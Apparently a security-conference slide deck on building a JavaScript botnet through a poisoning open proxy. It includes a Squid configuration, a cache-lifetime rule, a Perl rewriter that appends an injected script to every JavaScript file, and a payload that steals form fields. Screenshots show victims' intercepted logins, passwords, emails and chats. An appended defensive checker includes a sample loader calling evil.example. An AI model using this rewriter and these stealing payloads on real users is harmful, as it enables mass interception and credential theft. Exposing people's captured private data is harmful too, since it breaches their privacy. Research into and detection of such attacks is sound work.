Owning "bad" guys {and mafia} with Javascript botnets
Chema Alonso & Manu "The Sur"
Informatica 64, www.informatica64.com

Let's do a botnet, but
• We are lazy
• We have no money
• We have no 0day
• We aren't the FBI
• We aren't Google, Apple or Microsoft either

Let them be infected

Man in the Middle schemas
• Network
• ARP Spoofing
• Rogue DHCP(6)
• ICMPv6 Spoofing
• SLAAC Attacks
• DNS Spoofing
• Evil FOCA Rulez!
[Screenshot: Evil FOCA 0.1.0.0. A DNS hijacking attack is configured with Domain "*" resolved as 1.2.3.4, and the log shows a neighbor-spoofing MITM between two IPv6 link-local hosts, followed by repeated "Sending neighbor discovery packets" entries.]

Man in the Browser
• Plugins
• BHO
• Addons
• Access to all data
• Passwords
• Code
• Banking trojans
• "A russian in my IE"
[Screenshot: XML_Troyano_Banco.xml open in Notepad; only a label fragment reading "ATM PIN" survives.]

JavaScript in the Middle
• Poisoning Browser cache
• Not permanent
• Deleting cache means infection cleaned
• Cached content is used if not expired
• Allows attackers to inject remote javascript
• Access to:
  • Cookies (not HTTPOnly, more or less)
  • HTML Code
  • Form fields
  • URLs
  • Code execution

Google Analytics js & malware
[Screenshot: Microsoft malware encyclopedia entry for Trojan JS/Redirector.GA. Published: Sep 30, 2010. Alert level: Severe. Detection initially created in definition 1.91.391.0, released Sep 30, 2010.]

How to inject JavaScript code
• Persistent XSS
• Owning HTTP Servers
• Network Man in the middle attacks
  • WiFi
  • ARP Spoofing
  • IPv6
• Memcache attacks
• Imagination

- Framework to own browser's cache
- Inject a javascript in each client
- That javascript loads payloads from C&C
- http://beefproject.com
- Very Well-Known

How to create a JavaScript Botnet from scratch

TOR Nodes
[Screenshot: Vidalia message log of a node running Tor v0.2.1.26 on Windows. The node opens an OR listener on 0.0.0.0:443 and a Directory listener on 0.0.0.0:9030, bootstraps to 100%, then logs that its DNS provider is hijacking failed lookups and that it will stop being an exit node for now. Later warnings say the ORPort and DirPort could not be confirmed reachable.]
Not a Rocket Science....

Buy a bullet-proof
• Not:
  • The Pirate Bay
  • Amazon (Remember Wikileaks)
  • Megaupload

Configure SQUID
[Diagram: the client's requests (GET / and GET /a.jsp, Host: www.web.com) go through the proxy to the web server. Home.html comes back unchanged. The second response comes back as "a.jsp + pasarela.js", which includes http://evil/payload.js, so the browser then sends GET /payload.js to host "evil".]

Configure SQUID Proxy
Squid.conf: Activate URL rewrite program

    # By default, a URL rewriter is not used.
    #Default:
    # none
    url_rewrite_program /etc/squid/poison.pl

.htaccess: Apache No Expiration Policy

    :/etc/squid# cat /var/www/tmp/.htaccess
    ExpiresActive On
    ExpiresDefault "access plus 3000 days"
    :/etc/squid#

Infect all JavaScript files

    #!/usr/bin/perl
    # Squid URL rewriter: reads one requested URL per line on stdin.
    while (<>) {
        chomp $_;
        if ($_ =~ /(.*\.js)/i) {
            # A JavaScript file was requested: fetch the original,
            # append pasarela.js to the local copy and answer with the local URL.
            $url = $1;
            system("/usr/bin/wget", "-q", "-O", "/var/www/tmp/$pid-$count.js", "$url");
            system("chmod o+r /var/www/tmp/$pid-$count.js");
            system("cat /etc/squid/pasarela.js >> /var/www/tmp/$pid-$count.js");
            print "http://127.0.0.1:80/tmp/$pid-$count.js\n";
        }
        else {
            # Any other URL is passed through unchanged.
            print "$_\n";
        }
        $count++;
    }

Infect all JavaScript files

    // pasarela.js: appended to every JavaScript file served by the proxy.
    function payload() {
        x = document.getElementById("poisonpayload");
        if (x == null) {
            // The strings written here are blank in the slide text.
            document.write(" ");
            document.write(" ");
        }
    }
    payload();

Publish your Proxy
[Screenshot: XROXY.COM "Add an Open Proxy to the Database" page. Submissions are verified, only hosts that are currently open HTTP proxies are added, listing may take hours, and no feedback is given on whether a submitted proxy was valid.]

Let Internet do the magic
[Screenshot: web search results for the proxy, showing it listed on www.xroxy.com (Whois Info, 13 Feb 2012) and on a "Simple Proxy List - IP Info" page (Status: Offline, Country: Germany).]

Do Payloads: Cookie stealing

    document.write(" ");

Do Payloads: Form fields stealing

    function JcLagStart() {
        var forms = parent.document.getElementsByTagName("form");
        for (i = 0; i < forms.length; i++) {
            // On submit, walk every form in the parent document
            // and collect each field as name%3dvalue.
            forms[i].addEventListener('submit', function () {
                var cadena = "";
                var forms = parent.document.getElementsByTagName("form");
                for (x = 0; x < forms.length; x++) {
                    var elements = forms[x].elements;
                    for (e = 0; e < elements.length; e++) {
                        // The trailing separator string is blank in the slide text.
                        cadena += elements[e].name + "%3d" + elements[e].value + "";
                    }
                }
                attachForm(cadena);
            }, false);
        }
    }

Who is using this kind of services?

Mafias: Help the Prince
[Comic: AGENT-X COMICS, www.agent-x.com.au]

Mafias: Nigerian Scammers
[Screenshot: the scammer's webmail folder, September to December 2011. Nearly every message has the subject "FROM BRITISH IMMIGRATION LAWYER'S BOARD OF DIRECTOR"; others read "SEND PAYMENT NOW SO WE WILL SEND YOUR WORK PERMIT CERT IMMEDIATELY FROM ..." and "GENTLY UNDERSTAND THAT WE CAN NOT PROCESS YOUR REQUEST WITHOUT 195 FEE".]
Mafias: Nigerian Scammers
[Screenshot: a sent message in the scammer's webmail, reproduced below.]

UK Immigration Work Permit and Visa Services

Our Duty is to provide you with a working permit from the UKBA and your firm supporting documents.

ENTRANCE WORK PERMIT as requested by the immigration department to enable your completement required documents and possible approval entry visa to be issued at the British high commissioner in your country, you are required to reach us with your passport scanning pages, with two passport photograph EU size along with your processing fee of GB £275 Pounds before we could issue of your ENTRANCE CLEARANCE WORK PERMIT from our office.

On receipt of these:-
(a) Your passport scanning pages,
(b) Two passport recent photographs
(c) Filled candidate payment form with processing fee of GB £275 pounds

We will to assist to forward all your details to British LABOUR DEPARTMENT for processing of your entry working permit certificate as requested by the immigration department which will guarantee the issuance of your four 4-years entry working visa at the British embassy in your country of residence. As soon as we received from you, your request will be process and issued within 43-HRS; This are generally mentioned in the prospectus of the Employment/Tourist tour or invitation by any UK company management for, and immediately your documents is approved admission in that particular institute will qualify him or her for entrance clearance entry working permit.

INFORMATION METHOD OF PAYMENT

You should reach us with your payment through the means western union money transfer or money-gram money transfer bank and print out the candidate payment form to fill with the payment transfer informations from the western union, scan and send back to our office with:-
(i) Passport scanning pages,
(ii) Two recent passport photographs along with the
(iii) Filled candidate payment form for processing and issuing of your entrance clearance work permit labour from our office.

Attached file is contained your application candidate payment form for entry clearance work permit certificate and make payment through the western union money transfer to Accountant
Receiver Name: (Mr Addison Stuart)
Address: 30-83 Long Lane, EC1A 9ET London U.K

Then print out the candidate payment form to fill, scan and send your passport scanned pages along with two passport photographs for immediate processing and issuing of your request from our office within 43 Hours

Mafias: Nigerian Scammers
[Screenshot: a reply in the same mailbox, reproduced below.]

Re: FOR YOUR KIND ATTENTION
From: "khem raj puri" <krajpuri@yahoo.com>
Date: 09/01/11 06:47 AM
To: britishlawyersworkpmt@englandmail.com

Dear Sir

I respected your kindly information for me about that job. But at that time my group clients are not to believe me for deposit that amount. So after given to the clearance paper then they are possible and believe to payment for me. We can not send you money through Western or Bank: Because our government can not give us to permission. If you are agree then only one way to send that amount in our Nepalese UK Embassy through your hand. Otherwise it is not possible to do for further processed then release the task.

Thanking about me
Regards
Khem Raj Puri

Mafias: Nigerian Scammers
[Screenshot: image attachments Picture1327.jpg, Picture.jpg and Picture1323.jpg, plus documents titled "ROYAL YORK HOTEL RECOMMENDATION" and "JOB OFFER ACCEPTANCE SLIP.JPG".]

Mafias: Predators
[Screenshot: dating-site profile "Axionqueen". Age: early 30's. Location: Keller, Texas. Gender: female. Looking for: dating / a relationship. Interested in: men. Member since: 3 months ago. Occupation: baby sitter.]
Mafias: Predators
[Screenshot: HaveAFling ("Find your Kiwi Fling") profile "Axionqueen". Single seeking males for serious relationships then marriage. Lives in Auckland, New Zealand. Age 31, Female, Aries. Last login 22 min ago.]

Mafias: Predators
[Screenshot: PlanetaLove USA profile "axionqueen". Age: 31. Gender: Female. Location: Lynchburg, Virginia, United States. Looking for a man between 39 and 60 years. Last online: online now.]

Mafias: Predators
[Screenshot: German-language social network profile "joyandreas32" with mailbox, friends and guestbook tabs.]

Mafias: Predators

kkbill1980(12:09:40 (UTC)): Hello sweetie
fiat176punto(12:12:49 (UTC)): Hello my sweet Mous
kkbill1980(12:13:00 (UTC)): how are you doinf sweetie
fiat176punto(12:13:16 (UTC)): doinf ???
kkbill1980(12:13:52 (UTC)): what am fine i just came back from the booking office and my love when did you really want me to come
fiat176punto(12:15:38 (UTC)): I want it that You come to me
fiat176punto(12:15:51 (UTC)): why what is the Problem
kkbill1980(12:16:03 (UTC)): when did u want me to come next week or what ?
fiat176punto(12:16:48 (UTC)): I dont now what is the best about you
kkbill1980(12:17:08 (UTC)): no problem am just asking to know the date i will choose to book the flight ticket and all i need to get all my papers with the flight ticket book it will cost me 700euro
fiat176punto(12:17:11 (UTC)): when is the best Day for Fly
kkbill1980(12:17:34 (UTC)): am ready to fly anytime so far you are ready to have me with you my love
fiat176punto(12:18:33 (UTC)): Year thats fine so I thing you can look for Wendsday
fiat176punto(12:19:11 (UTC)): When its no Problem for you
kkbill1980(12:20:16 (UTC)): okay that is good
fiat176punto(12:20:21 (UTC)): Baby You have my Address now
kkbill1980(12:20:54 (UTC)): and when did you think you can get the 700euro send so that i can make the booking and get everything ready for me to fly down to germany
fiat176punto(12:22:05 (UTC)): Baby You have my Address now
fiat176punto(12:22:15 (UTC)): ???
kkbill1980(12:22:18 (UTC)): i will send you the full nicked pics tonight
fiat176punto(12:23:11 (UTC)): oh Baby this is nice
kkbill1980(12:23:16 (UTC)): when did you think you will have chance to go and send me the 700euro for the booking so that i will get everything ready
fiat176punto(12:24:57 (UTC)): The pictures are so tht I can see your all Pircings ???
kkbill1980(12:25:18 (UTC)): i will send you my full information so that you can use it to send the money from western union to me okay
fiat176punto(12:25:49 (UTC)): yes Baby when You sen the Pic You can send me were I must Take the Money
kkbill1980(12:26:16 (UTC)): sorry i dont understand you my love
fiat176punto(12:27:17 (UTC)): When You send The Pictures to night You can sent me the Western Union Information
kkbill1980(12:27:58 (UTC)): I am asking you when you have time to go and send me the 700 €, so that I can do the booking and get everything ready
kkbill1980(12:30:15 (UTC)): are you there

Mafias: Predators
[Screenshot: Yahoo! Mail search for "western union" returning 153 messages: Chats (129), Sent (13), Inbox (11). The result previews repeat the text of the messages reproduced on the next slide.]

Mafias: Predators

From: Kayla Bill
Subject: Re: Schatz I love you big Kiss
To: "Josef Landhuis"
Date: Thursday, 23 February 2012, 07:10

Hello sweetie why you have not sent me the nicked pics you promise me ? and i just sent you my nicked pics and please dont show it to another person is for only your eyes okay i love you and i will be waiting to chat with you when you come online today i miss you and last night my net was bad that is why i did not come online last night and i have also send you my info for the western union

From: Josef Landhuis
Date: Wednesday, February 29, 2012, 4:05 AM

hello Baby I dont no but but my Bankmanager ask me that the Address City and country is not pasibel now what we can do ??? gime a athoer one please
Your love Josef big Kiss Baby

From: Kayla Bill
Subject: Re: Schatz I lov...
To: "Josef Landhuis"
Date: Wednesday, 29 February 2012, 14:43

fuck it stop playing game on me i gave you my right address and what is your bank manager with sending money if you are truthful collect the money from your bank and look for a western union shop to send it or you just forget about it and stop playing game with my heart

Dog Scammers
[Screenshot: the advertiser's "My Ads" page with five active listings titled "Charming Registered Yorkshire ...", each priced $200.00, start 2/29/2012, expiry 3/30/2012.]

Warning! This picture could hurt your emotions...

Dog Scammers
[Screenshot: classified ad detail. Category: For Sale - Free Stuff, Freebies, & Bargains. Views: 7. Start Date: 2/29/2012. Price: $200.00. Advertiser: jessicabrown12.]

Psychotics
[Screenshot: captured search-form submissions from a single client IP address to adult video sites, with search terms for violent content.]

Anonymous
[Screenshot: captured forms from whatismyipaddress.com (7 forms) and hideme.ru.]

Anonymous
[Screenshot: "Domains of zombie" panel listing the domains visited through one client, among them 2ip.ru, anunturi.telegrafonline.ro, facebook.com (with a captured URL and cookie) and whatismyipaddress.com.]
Rare people in a rare World
[Screenshot: account balance page of an online service with "Refer A Friend" and "Affiliate Program" tabs. "Since joining up, you have accumulated a total of $24.38"; the balance is not yet redeemable. The page displays 1 to 20 of 383 articles (for example "Culinary Traditions Of France", "Why Network Marketing Sucks"), each credited $0.04 to $0.07 with timestamps about a minute apart on 2/29/2012.]

HaxOrs and defacers....
[Screenshot: captured form fields posted to www.trendwp.com by a file-manager web shell working in /home/trend/public_html/demo/trendhaber/wp-includes/css, with fields such as newdirname, newperm, newfilename, uploadfile and doupfile.]

...hacking...
[Screenshot: www.trendwp.com showing a "Hacked By SkyNet" page with Turkish text.]

...and hacked
[Screenshot: "SkyNet | Casus Shell" (PhpSpy Ver: 2010) at www.trendwp.com/demo/trendhaber/wp-includes/css/casus.php, showing a file manager over the wp-includes/css directory. The browser's developer tools Network panel shows casus.php requesting a remote security.js with GET, answered 404 Not Found.]

Intranets
[Screenshot: captured form data from an intranet application at a single IP address: a Spanish-language property appraisal request form and a login form with user name and password fields.]

And, of course, PrOn
[Screenshot: a Spanish-language web article; the text is not recoverable.]
[Screenshot: chaturbate.com, 2 forms. Captured login and account registration submissions from two client IP addresses, including the CSRF token, user name and password fields.]

Do Payloads: Infect webs for the future
[Screenshot: browser Network panel for the Tuenti login page (/?m=login), listing the script and image requests it loads.]
Targeting Attacks
• Select the Target
  • Bank
  • Social Network
  • Intranet
• Analyze loaded files
• Payload:
  • Inject and load an infected file for that target, in every website the victim visits.
• Profit.

Demo Facebook

Protections
• Take care of MITM schemas
  • Proxy
  • TOR networks
• After using them, clean all
• Cache is not your friend on the Internet
• VPNs are not a silver bullet

Questions?
chema@informatica64.com
mfernandez@informatica64.com
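An added example, not part of the original slides: a defender-side check for the poisoning described on the "Infect all JavaScript files" and ".htaccess: Apache No Expiration Policy" slides. It compares a script received through an untrusted proxy with a reference copy obtained over a trusted path, reports code appended after the original (what the rewriter does with pasarela.js), and flags cache lifetimes far beyond a threshold. All function names, the one-year threshold, the host evil.example and the sample responses are assumptions constructed for illustration.

```javascript
// Added example: audit one proxied script response against a trusted reference.
// Names, threshold and sample data are constructed for illustration.

const MAX_TTL_SECONDS = 365 * 24 * 3600; // assumption: above one year is suspicious

// Cache lifetime in seconds implied by the headers, or null if none is stated.
function cacheLifetimeSeconds(headers, now) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);
  const m = /(?:^|,)\s*max-age\s*=\s*"?(\d+)/i.exec(h['cache-control'] || '');
  if (m) return parseInt(m[1], 10); // max-age takes precedence over Expires
  if (h['expires']) {
    const exp = Date.parse(h['expires']);
    if (Number.isNaN(exp)) return 0; // an invalid date means already expired
    const date = h['date'] ? Date.parse(h['date']) : now;
    const base = Number.isNaN(date) ? now : date;
    return Math.max(0, Math.round((exp - base) / 1000));
  }
  return null;
}

// Classify how the received body differs from the reference body.
function compareBodies(reference, received) {
  // Normalise line endings so a CRLF/LF difference alone is not reported.
  const ref = reference.replace(/\r\n/g, '\n').trimEnd();
  const got = received.replace(/\r\n/g, '\n').trimEnd();
  if (got === ref) return { verdict: 'identical', extra: '' };
  if (got.startsWith(ref)) {
    return { verdict: 'appended', extra: got.slice(ref.length).trim() };
  }
  if (got.endsWith(ref)) {
    return { verdict: 'prepended', extra: got.slice(0, got.length - ref.length).trim() };
  }
  return { verdict: 'modified', extra: '' };
}

// Look for script-loading constructs and remote URLs in the extra code.
function scriptLoadIndicators(code) {
  const calls = [];
  if (/document\.write\s*\(/.test(code)) calls.push('document.write');
  if (/createElement\s*\(\s*['"]script['"]\s*\)/i.test(code)) {
    calls.push('createElement(script)');
  }
  const urls = code.match(/https?:\/\/[^\s'"<>)]+/g) || [];
  return { calls, urls: [...new Set(urls)] };
}

// Combine the checks into a list of findings for one response.
function auditScript(reference, response, now = Date.now()) {
  const findings = [];
  const cmp = compareBodies(reference, response.body);
  if (cmp.verdict !== 'identical') findings.push('body-' + cmp.verdict);
  const indicators = scriptLoadIndicators(cmp.extra);
  if (indicators.calls.length || indicators.urls.length) {
    findings.push('extra-code-loads-remote-script');
  }
  const ttl = cacheLifetimeSeconds(response.headers, now);
  if (ttl !== null && ttl > MAX_TTL_SECONDS) findings.push('excessive-cache-lifetime');
  return { findings, ttl, extra: cmp.extra, indicators };
}

// Constructed sample: the reference script as the origin serves it.
const REFERENCE_JS = 'function track(id) { return "t=" + id; }\n';

// Constructed sample: the same script as a poisoning proxy would return it,
// with a loader appended and "access plus 3000 days" as max-age (259200000 s).
const POISONED_RESPONSE = {
  headers: {
    'Date': 'Wed, 29 Feb 2012 12:00:00 GMT',
    'Cache-Control': 'max-age=259200000',
  },
  body: REFERENCE_JS +
    'function payload() {\n' +
    '  if (document.getElementById("poisonpayload") == null) {\n' +
    '    document.write("<script id=\'poisonpayload\' ' +
    'src=\'http://evil.example/payload.js\'></script>");\n' +
    '  }\n' +
    '}\n' +
    'payload();\n',
};

console.log(auditScript(REFERENCE_JS, POISONED_RESPONSE).findings);
```

The reference copy has to come from a path that does not traverse the proxy under test, otherwise both copies carry the same appended code and compare as identical.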